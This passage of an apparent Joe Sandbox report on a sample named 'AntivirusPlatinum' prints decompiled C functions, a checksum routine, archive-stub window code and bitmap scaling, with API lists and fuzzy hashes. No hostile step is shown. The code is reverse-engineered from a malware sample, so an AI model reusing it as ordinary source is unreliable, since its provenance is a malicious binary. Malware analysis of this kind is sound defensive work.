* 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
                                                                                                                                                      						_t71 = _t71 - 1;
                                                                                                                                                      					} while (_t71 != 0);
                                                                                                                                                      				}
                                                                                                                                                      				_t54 = 0;
                                                                                                                                                      				if(_t74 > 0) {
                                                                                                                                                      					do {
                                                                                                                                                      						_t28 = _t28 >> 0x00000008 ^  *(0x4141c0 + ( *(_t54 + _t53) & 0x000000ff ^ _t28 & 0x000000ff) * 4);
                                                                                                                                                      						_t54 = _t54 + 1;
                                                                                                                                                      					} while (_t54 < _t74);
                                                                                                                                                      				}
                                                                                                                                                      				return _t28;
                                                                                                                                                      			}









                                                                                                                                                      0x00402ccc
                                                                                                                                                      0x00402cce
                                                                                                                                                      0x00402cce
                                                                                                                                                      0x00402cd3
                                                                                                                                                      0x00402cd7
                                                                                                                                                      0x00402cdc
                                                                                                                                                      0x00402ce1
                                                                                                                                                      0x00402cf5
                                                                                                                                                      0x00402cfc
                                                                                                                                                      0x00402cfd
                                                                                                                                                      0x00402cfd
                                                                                                                                                      0x00402d03
                                                                                                                                                      0x00402d07
                                                                                                                                                      0x00402d0a
                                                                                                                                                      0x00402d0a
                                                                                                                                                      0x00402d0c
                                                                                                                                                      0x00402d1c
                                                                                                                                                      0x00402d7a
                                                                                                                                                      0x00402d81
                                                                                                                                                      0x00402d81
                                                                                                                                                      0x00402d0a
                                                                                                                                                      0x00402d84
                                                                                                                                                      0x00402d88
                                                                                                                                                      0x00402d8b
                                                                                                                                                      0x00402d97
                                                                                                                                                      0x00402d9e
                                                                                                                                                      0x00402d9f
                                                                                                                                                      0x00402da3
                                                                                                                                                      0x00402da6

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f0356b928a5c8748b773292bb5a3f3348234b7994c9787135c7941ce81f34bb9
                                                                                                                                                      • Instruction ID: 0cb11850dc2377cddf84538798f7ae426082b721ee3b3fe272e98e9b9c12c88d
                                                                                                                                                      • Opcode Fuzzy Hash: f0356b928a5c8748b773292bb5a3f3348234b7994c9787135c7941ce81f34bb9
                                                                                                                                                      • Instruction Fuzzy Hash: D621F6318340B16AC344EAA9FD8C57737D2EBD3306759867AD780932D4C23CA952D778
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E00406D54(void* __ecx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				struct tagPOINT _v20;
                                                                                                                                                      				struct HWND__* _t37;
                                                                                                                                                      				struct HWND__* _t38;
                                                                                                                                                      				long _t41;
                                                                                                                                                      				struct HWND__* _t43;
                                                                                                                                                      				struct HWND__* _t44;
                                                                                                                                                      				void* _t74;
                                                                                                                                                      				CHAR* _t75;
                                                                                                                                                      
                                                                                                                                                      				_t74 = __ecx;
                                                                                                                                                      				if( *((char*)(__ecx + 0x14)) == 0) {
                                                                                                                                                      					__imp__OleInitialize(0);
                                                                                                                                                      					__imp__#17();
                                                                                                                                                      					 *((char*)(__ecx + 0x14)) = 1;
                                                                                                                                                      				}
                                                                                                                                                      				 *((char*)(_t74 + 0x15)) = 0;
                                                                                                                                                      				ShowWindow(_a8, 0);
                                                                                                                                                      				E00406CED(_t74, _a4);
                                                                                                                                                      				 *((intOrPtr*)(_t74 + 0x10)) = _a12;
                                                                                                                                                      				GetWindowRect(_a8,  &_v20);
                                                                                                                                                      				MapWindowPoints(0, GetParent(_a8),  &_v20, 2);
                                                                                                                                                      				_t37 =  *(_t74 + 4);
                                                                                                                                                      				if(_t37 != 0) {
                                                                                                                                                      					DestroyWindow(_t37);
                                                                                                                                                      				}
                                                                                                                                                      				_t38 = GetParent(_a8);
                                                                                                                                                      				_t41 = _v20.x;
                                                                                                                                                      				_t67 = _v12 - _t41;
                                                                                                                                                      				_t43 = CreateWindowExA(0, "RarHtmlClassName", 0, 0x40000000, _t41 + 1, _v20.y, _v12 - _t41, _v8 - _v20.y, _t38, 0,  *_t74, _t74);
                                                                                                                                                      				 *(_t74 + 4) = _t43;
                                                                                                                                                      				if(_t43 != 0) {
                                                                                                                                                      					ShowWindow(_t43, 5);
                                                                                                                                                      					_t43 = UpdateWindow( *(_t74 + 4));
                                                                                                                                                      				}
                                                                                                                                                      				if( *((char*)(_t74 + 0x15)) == 0) {
                                                                                                                                                      					_t44 =  *(_t74 + 4);
                                                                                                                                                      					if(_t44 != 0) {
                                                                                                                                                      						DestroyWindow(_t44);
                                                                                                                                                      						 *(_t74 + 4) = 0;
                                                                                                                                                      					}
                                                                                                                                                      					ShowWindow(_a8, 5);
                                                                                                                                                      					_t61 = E0040A1EC(0x100 + E0040A384(_t67, _a12) * 6);
                                                                                                                                                      					E0040A477(_t49, _a12);
                                                                                                                                                      					if(E004065B9(_t61) == 0) {
                                                                                                                                                      						E004065E9(_t74, _t61);
                                                                                                                                                      					}
                                                                                                                                                      					_t75 = E00406A19(_t74, _t61);
                                                                                                                                                      					_t43 = E0040A205(_t61);
                                                                                                                                                      					if(_t75 != 0) {
                                                                                                                                                      						SetWindowTextA(_a8, _t75);
                                                                                                                                                      						return E0040A205(_t75);
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					if( *((intOrPtr*)(_t74 + 0x18)) > 0x64) {
                                                                                                                                                      						return E004066B3(_t74);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t43;
                                                                                                                                                      			}













                                                                                                                                                      0x00406d5c
                                                                                                                                                      0x00406d63
                                                                                                                                                      0x00406d67
                                                                                                                                                      0x00406d6d
                                                                                                                                                      0x00406d73
                                                                                                                                                      0x00406d73
                                                                                                                                                      0x00406d82
                                                                                                                                                      0x00406d86
                                                                                                                                                      0x00406d8d
                                                                                                                                                      0x00406d95
                                                                                                                                                      0x00406d9f
                                                                                                                                                      0x00406db9
                                                                                                                                                      0x00406dbf
                                                                                                                                                      0x00406dc4
                                                                                                                                                      0x00406dc7
                                                                                                                                                      0x00406dc7
                                                                                                                                                      0x00406dd5
                                                                                                                                                      0x00406de4
                                                                                                                                                      0x00406dea
                                                                                                                                                      0x00406dfd
                                                                                                                                                      0x00406e03
                                                                                                                                                      0x00406e08
                                                                                                                                                      0x00406e0d
                                                                                                                                                      0x00406e12
                                                                                                                                                      0x00406e12
                                                                                                                                                      0x00406e1c
                                                                                                                                                      0x00406e2d
                                                                                                                                                      0x00406e32
                                                                                                                                                      0x00406e35
                                                                                                                                                      0x00406e3b
                                                                                                                                                      0x00406e3b
                                                                                                                                                      0x00406e43
                                                                                                                                                      0x00406e5e
                                                                                                                                                      0x00406e61
                                                                                                                                                      0x00406e70
                                                                                                                                                      0x00406e75
                                                                                                                                                      0x00406e75
                                                                                                                                                      0x00406e83
                                                                                                                                                      0x00406e85
                                                                                                                                                      0x00406e8c
                                                                                                                                                      0x00406e92
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406e99
                                                                                                                                                      0x00406e1e
                                                                                                                                                      0x00406e22
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406e26
                                                                                                                                                      0x00406e22
                                                                                                                                                      0x00406ea2

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Show$DestroyParent$CreateInitializePointsRectTextUpdate
                                                                                                                                                      • String ID: RarHtmlClassName
                                                                                                                                                      • API String ID: 2853670363-1658105358
                                                                                                                                                      • Opcode ID: 847cbe9744d6f9c96df690b184ecb2e54258959ff2f53691c322438f891e790a
                                                                                                                                                      • Instruction ID: a00efe7b2d33d11f981a855a221e61759c6655e01f9ee02c7d4733981d41992d
                                                                                                                                                      • Opcode Fuzzy Hash: 847cbe9744d6f9c96df690b184ecb2e54258959ff2f53691c322438f891e790a
                                                                                                                                                      • Instruction Fuzzy Hash: DE41C570600704BFDB21AF65DD49FAF7BA9EF44700F01852AF856E2291CB789920CB69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E0040ABDC(void* _a4, signed int _a8, int _a12) {
                                                                                                                                                      				struct HDC__* _v8;
                                                                                                                                                      				struct HDC__* _v12;
                                                                                                                                                      				struct HBITMAP__* _v16;
                                                                                                                                                      				void* _v20;
                                                                                                                                                      				signed int _v36;
                                                                                                                                                      				signed int _v40;
                                                                                                                                                      				void _v44;
                                                                                                                                                      				struct HDC__* _t36;
                                                                                                                                                      				signed int _t43;
                                                                                                                                                      				struct HDC__* _t54;
                                                                                                                                                      
                                                                                                                                                      				_t36 = GetDC(0);
                                                                                                                                                      				_v12 = _t36;
                                                                                                                                                      				_t54 = CreateCompatibleDC(_t36);
                                                                                                                                                      				_v8 = CreateCompatibleDC(_v12);
                                                                                                                                                      				GetObjectA(_a4, 0x18,  &_v44);
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				_t43 = _v36 * _a8 / _v40;
                                                                                                                                                      				if(_t43 < _a12) {
                                                                                                                                                      					_a12 = _t43;
                                                                                                                                                      				}
                                                                                                                                                      				_v16 = CreateCompatibleBitmap(_v12, _a8, _a12);
                                                                                                                                                      				_a4 = SelectObject(_t54, _a4);
                                                                                                                                                      				_v20 = SelectObject(_v8, _v16);
                                                                                                                                                      				StretchBlt(_v8, 0, 0, _a8, _a12, _t54, 0, 0, _v40, _v36, 0xcc0020);
                                                                                                                                                      				SelectObject(_t54, _a4);
                                                                                                                                                      				SelectObject(_v8, _v20);
                                                                                                                                                      				DeleteDC(_t54);
                                                                                                                                                      				DeleteDC(_v8);
                                                                                                                                                      				ReleaseDC(0, _v12);
                                                                                                                                                      				return _v16;
                                                                                                                                                      			}













                                                                                                                                                      0x0040abe8
                                                                                                                                                      0x0040abf5
                                                                                                                                                      0x0040abfd
                                                                                                                                                      0x0040ac01
                                                                                                                                                      0x0040ac0d
                                                                                                                                                      0x0040ac1a
                                                                                                                                                      0x0040ac1b
                                                                                                                                                      0x0040ac21
                                                                                                                                                      0x0040ac23
                                                                                                                                                      0x0040ac23
                                                                                                                                                      0x0040ac3f
                                                                                                                                                      0x0040ac47
                                                                                                                                                      0x0040ac57
                                                                                                                                                      0x0040ac6b
                                                                                                                                                      0x0040ac75
                                                                                                                                                      0x0040ac7d
                                                                                                                                                      0x0040ac86
                                                                                                                                                      0x0040ac8b
                                                                                                                                                      0x0040ac91
                                                                                                                                                      0x0040ac9e

                                                                                                                                                      APIs
                                                                                                                                                      • GetDC.USER32(00000000), ref: 0040ABE8
                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0040ABF8
                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 0040ABFF
                                                                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0040AC0D
                                                                                                                                                      • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 0040AC2F
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0040AC42
                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0040AC4D
                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040AC6B
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0040AC75
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040AC7D
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 0040AC86
                                                                                                                                                      • DeleteDC.GDI32(?), ref: 0040AC8B
                                                                                                                                                      • ReleaseDC.USER32 ref: 0040AC91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3950507155-0
                                                                                                                                                      • Opcode ID: 629bea9404d9b5a6bf81915325d9dfd7339313f3d0e0db77c6006f5bcc1e4a8d
                                                                                                                                                      • Instruction ID: 49fe361b3f63de033719242860511c57cf4e76dfbbd86f1750afdf69dbc3ac75
                                                                                                                                                      • Opcode Fuzzy Hash: 629bea9404d9b5a6bf81915325d9dfd7339313f3d0e0db77c6006f5bcc1e4a8d
                                                                                                                                                      • Instruction Fuzzy Hash: 1F21A276800258FFCF119FA1DD48CDEBFBAFB49350B108466FA14A2120C7759A60EFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040BA36(void* __edx, void* __eflags, signed int _a4) {
                                                                                                                                                      				struct HWND__* _v8;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                      				void _v32;
                                                                                                                                                      				char _v1056;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				struct HWND__* _t15;
                                                                                                                                                      				int _t25;
                                                                                                                                                      				struct HWND__* _t35;
                                                                                                                                                      				void* _t39;
                                                                                                                                                      				void* _t47;
                                                                                                                                                      
                                                                                                                                                      				_t14 = E0040AD27(__eflags);
                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                      					return _t14;
                                                                                                                                                      				}
                                                                                                                                                      				_t15 = GetWindow(_a4, 5);
                                                                                                                                                      				_a4 = _a4 & 0x00000000;
                                                                                                                                                      				_t35 = _t15;
                                                                                                                                                      				_v8 = _t35;
                                                                                                                                                      				if(_t35 == 0) {
                                                                                                                                                      					L12:
                                                                                                                                                      					return _t15;
                                                                                                                                                      				} else {
                                                                                                                                                      					while(_a4 < 0x200) {
                                                                                                                                                      						GetClassNameA(_t35,  &_v1056, 0x400);
                                                                                                                                                      						if(E0040DA54( &_v1056, "STATIC") == 0 && (GetWindowLongA(_t35, 0xfffffff0) & 0x0000001f) == 0xe) {
                                                                                                                                                      							_t39 = SendMessageA(_t35, 0x173, 0, 0);
                                                                                                                                                      							if(_t39 != 0) {
                                                                                                                                                      								GetObjectA(_t39, 0x18,  &_v32);
                                                                                                                                                      								_t25 = E0040ACE4(_v24);
                                                                                                                                                      								SendMessageA(_t35, 0x172, 0, E0040ABDC(_t39, E0040ACA1(_v28), _t25));
                                                                                                                                                      								_t47 = _t39 -  *0x4192d0; // 0xec050b71
                                                                                                                                                      								if(_t47 != 0) {
